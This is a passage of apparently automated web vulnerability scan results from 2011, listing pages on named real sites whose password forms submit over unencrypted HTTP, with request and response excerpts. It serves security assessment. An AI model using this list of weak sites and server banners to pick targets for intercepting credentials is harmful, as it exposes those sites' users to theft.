<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<div id="login" name="login" method="post" action="/community/rtn_login08.php">
<form id="form_login">
<fieldset>
...[SNIP]...
<td>
<input name="upass" type="password" id="jq_password" class="inputtext" />
</td>
...[SNIP]...

6.111. http://www.noreastermagazine.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.noreastermagazine.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.noreastermagazine.com/index.php
The form contains the following password field:
  • passwd

Request

GET / HTTP/1.1
Host: www.noreastermagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: 7f17775ebaca27b049989f22de967fcd=8770a74d6eac2afa63076869bfca0779; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:08:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5572
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
</p>
       <form action="index.php" method="post" name="login" id="form-login">
   <fieldset class="input">
...[SNIP]...
<br />
           <input type="password" name="passwd" class="inputbox" size="18" alt="Password" id="passwd" />
       </p>
...[SNIP]...

6.112. http://www.paperg.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.paperg.com/
The form contains the following password field:
  • pass

Request

GET / HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:04:37 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 10755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...

6.113. http://www.playshakespeare.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.playshakespeare.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.playshakespeare.com/index.php
The form contains the following password field:
  • passwd

Request

GET / HTTP/1.1
Host: www.playshakespeare.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: eab80364d83027bfc601e73262603d25=341187f485832c9a1355235ffc880801; path=/
Last-Modified: Mon, 24 Jan 2011 15:15:14 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 180908

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns=
...[SNIP]...
<div id="form-login-area">
                               <form action="/index.php" method="post" name="login" id="form-login" >
                               <fieldset class="input">
...[SNIP]...
<br />
                   <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
               </p>
...[SNIP]...

6.114. http://www.regattaregatta.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regattaregatta.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.regattaregatta.com/index.php/component/user/?task=login
The form contains the following password field:
  • passwd

Request

GET / HTTP/1.1
Host: www.regattaregatta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:28:38 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: 9d1da0e50aa9b6d723bb7d2254c4deb6=e77aa027edf65e1c9fc004520497c394; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: currentURI=http%3A%2F%2Fwww.regattaregatta.com%2Findex.php; expires=Wed, 26-Jan-2011 02:28:38 GMT; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 02:28:38 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<div class="hellomid">
               <form action="/index.php/component/user/?task=login" method="post" name="form-login" id="form-login" >
                                       <fieldset class="input">
...[SNIP]...
<br />
                           <input type="password" name="passwd" id="passwd" class="inputbox" size="18" alt="password" />
                       </label>
...[SNIP]...

6.115. http://www.rockettheme.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rockettheme.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.rockettheme.com/index.php
The form contains the following password field:
  • passwd

Request

GET / HTTP/1.1
Host: www.rockettheme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:10 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: cd6974ce18b02e32626c9ea04659f148=eec83c2a8abb5457a4ec33e10c194c24; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:01:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>

...[SNIP]...
<div id="rokclub-login" class="login">
<form action="/index.php" method="post" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.116. http://www.shape.com/workouts/articles/blood_sugar.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shape.com
Path:   /workouts/articles/blood_sugar.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.shape.com/kickapps/public/ajax-login
The form contains the following password field:
  • password

Request

GET /workouts/articles/blood_sugar.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Apache
Cache-Control: max-age=900
Location: http://www.shape.com/workouts/articles/blood-sugar.html
X-Server-Name: (null)
ETag: "1295922530"
Last-Modified: Tue, 25 Jan 2011 02:28:50 +0000
X-Powered-By: PHP/5.2.13
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:43:49 GMT
Content-Type: text/html; charset=utf-8
Age: 0
Via: 1.1 mdw107101 (MII-APC/1.6)
Connection: close
Content-Length: 27234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<div class="upper_login_not_logged" style="display: none;">
<form action="/kickapps/public/ajax-login" method="POST">
<table border="0">
...[SNIP]...
<input type="text" value="Password" name="password-clear" /><input style="display: none;" type="password" name="password" /></div>
...[SNIP]...

6.117. http://www.shape.com/workouts/articles/workout_schedule.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shape.com
Path:   /workouts/articles/workout_schedule.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.shape.com/kickapps/public/ajax-login
The form contains the following password field:
  • password

Request

GET /workouts/articles/workout_schedule.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 02:28:49 GMT
Server: Apache
Cache-Control: max-age=900
Location: http://www.shape.com/workouts/articles/workout-schedule.html
X-Server-Name: (null)
ETag: "1295922529"
Last-Modified: Tue, 25 Jan 2011 02:28:49 +0000
X-Powered-By: PHP/5.2.13
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:43:49 GMT
Content-Type: text/html; charset=utf-8
Age: 0
Via: 1.1 mdw107101 (MII-APC/1.6)
Connection: close
Content-Length: 27239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<div class="upper_login_not_logged" style="display: none;">
<form action="/kickapps/public/ajax-login" method="POST">
<table border="0">
...[SNIP]...
<input type="text" value="Password" name="password-clear" /><input style="display: none;" type="password" name="password" /></div>
...[SNIP]...

6.118. http://www.svenskjoomla.se/index.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.svenskjoomla.se
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.svenskjoomla.se/index.php?option=com_comprofiler&task=login
The form contains the following password field:
  • passwd

Request

GET /index.php HTTP/1.1
Host: www.svenskjoomla.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:15 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7e-p1 PHP/5.2.4 with Suhosin-Patch
X-Powered-By: PHP/5.2.4
Set-Cookie: c785f5238e48c40198c070b75c5431da=-; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:01:15 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19582

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...
<td>
               <form action="http://www.svenskjoomla.se/index.php?option=com_comprofiler&amp;task=login" method="post" id="mod_loginform">
Du behöver inte registrera dig för att ladda ner språkfiler.<br />
...[SNIP]...
<br /><input type="password" name="passwd" class="inputbox" size="10" /><br />
...[SNIP]...

6.119. http://www.thefeast.com/boston/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.thefeast.com/i/dispatcher/?h=feastuser
The form contains the following password field:
  • loginPassword

Request

GET /boston/ HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:22:48 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:31 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 280280


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://o
...[SNIP]...
</form>


<form id="loginForm" name="loginForm" action="/i/dispatcher/?h=feastuser" method="post">
<span class="loginAlreadyMeetText">
...[SNIP]...
</label>
<input id="loginPassword" name="loginPassword" type="password" tabindex="116" size="20" />
<!--onkeydown='javascript: //if(event.keyCode==13) submitLoginForm();'-->
...[SNIP]...

6.120. http://www.thefeast.com/boston/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.thefeast.com/i/dispatcher/?h=feastuser
The form contains the following password field:
  • regPassword

Request

GET /boston/ HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:22:48 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:31 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 280280


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://o
...[SNIP]...
</div>


<form id="regForm" name="regForm" action="/i/dispatcher/?h=feastuser" method="post" enctype="multipart/form-data">


<div class="formContent">
...[SNIP]...
</label>
<input id="regPassword" name="regPassword" type="password" size="20" tabindex="109"/>
<span class="errorText">
...[SNIP]...

6.121. http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.thefeast.com/i/dispatcher/?h=feastuser
The form contains the following password field:
  • loginPassword

Request

GET /boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r2-u21
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255575


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</form>


<form id="loginForm" name="loginForm" action="/i/dispatcher/?h=feastuser" method="post">
<span class="loginAlreadyMeetText">
...[SNIP]...
</label>
<input id="loginPassword" name="loginPassword" type="password" tabindex="116" size="20" />
<!--onkeydown='javascript: //if(event.keyCode==13) submitLoginForm();'-->
...[SNIP]...

6.122. http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.thefeast.com/i/dispatcher/?h=feastuser
The form contains the following password field:
  • regPassword

Request

GET /boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r2-u21
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255575


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</div>


<form id="regForm" name="regForm" action="/i/dispatcher/?h=feastuser" method="post" enctype="multipart/form-data">


<div class="formContent">
...[SNIP]...
</label>
<input id="regPassword" name="regPassword" type="password" size="20" tabindex="109"/>
<span class="errorText">
...[SNIP]...

6.123. http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.thefeast.com/i/dispatcher/?h=feastuser
The form contains the following password field:
  • regPassword

Request

GET /boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:42 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</div>


<form id="regForm" name="regForm" action="/i/dispatcher/?h=feastuser" method="post" enctype="multipart/form-data">


<div class="formContent">
...[SNIP]...
</label>
<input id="regPassword" name="regPassword" type="password" size="20" tabindex="109"/>
<span class="errorText">
...[SNIP]...

6.124. http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.thefeast.com/i/dispatcher/?h=feastuser
The form contains the following password field:
  • loginPassword

Request

GET /boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:42 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</form>


<form id="loginForm" name="loginForm" action="/i/dispatcher/?h=feastuser" method="post">
<span class="loginAlreadyMeetText">
...[SNIP]...
</label>
<input id="loginPassword" name="loginPassword" type="password" tabindex="116" size="20" />
<!--onkeydown='javascript: //if(event.keyCode==13) submitLoginForm();'-->
...[SNIP]...

6.125. http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.thefeast.com/i/dispatcher/?h=feastuser
The form contains the following password field:
  • loginPassword

Request

GET /boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:35 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 282213


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</form>


<form id="loginForm" name="loginForm" action="/i/dispatcher/?h=feastuser" method="post">
<span class="loginAlreadyMeetText">
...[SNIP]...
</label>
<input id="loginPassword" name="loginPassword" type="password" tabindex="116" size="20" />
<!--onkeydown='javascript: //if(event.keyCode==13) submitLoginForm();'-->
...[SNIP]...

6.126. http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.thefeast.com/i/dispatcher/?h=feastuser
The form contains the following password field:
  • regPassword

Request

GET /boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:35 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 282213


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</div>


<form id="regForm" name="regForm" action="/i/dispatcher/?h=feastuser" method="post" enctype="multipart/form-data">


<div class="formContent">
...[SNIP]...
</label>
<input id="regPassword" name="regPassword" type="password" size="20" tabindex="109"/>
<span class="errorText">
...[SNIP]...

6.127. http://www.usaca.info/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usaca.info
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.usaca.info/index.php
The form contains the following password field:
  • passwd

Request

GET / HTTP/1.1
Host: www.usaca.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 3730abe3084fe49ecac82b2df16b8c34=t18frpf95fah7u5jd67rlg4355; path=/
Set-Cookie: ja_purity_tpl=ja_purity; expires=Sun, 15-Jan-2012 04:39:36 GMT; path=/
Last-Modified: Tue, 25 Jan 2011 04:39:36 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
</h3>
                   <form action="index.php" method="post" name="form-login" id="form-login" >
   USACA Contributor Login:    <fieldset class="input">
...[SNIP]...
<br />
           <input type="password" name="passwd" id="passwd" class="inputbox" size="18" alt="password" />
       </label>
...[SNIP]...

6.128. http://www.w-w-i.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.w-w-i.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.w-w-i.com/logoffon.php
The form contains the following password field:
  • pword

Request

GET / HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:55 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
X-Powered-By: PHP/4.3.10-22
P3P: policyref="http://www.w-w-i.com/w3c/p3p.xml",
Set-Cookie: THESESSION=104b6d5a3b663e017fccb9e7614f776c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 11624

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>World Wide Images :: Online Press Office</title>
<meta name="keywords" content="World Wi
...[SNIP]...
<div id="search3" class="search"><form method="post" enctype="multipart/form-data" action="logoffon.php"><div>
...[SNIP]...
<br><input type="password" name="pword" id="pword"><br>
...[SNIP]...

6.129. http://www.w-w-i.com/velux_5_oceans_2010_race/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.w-w-i.com
Path:   /velux_5_oceans_2010_race/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.w-w-i.com/velux_5_oceans_2010_race/logoffon.php
The form contains the following password field:
  • pword

Request

GET /velux_5_oceans_2010_race/ HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
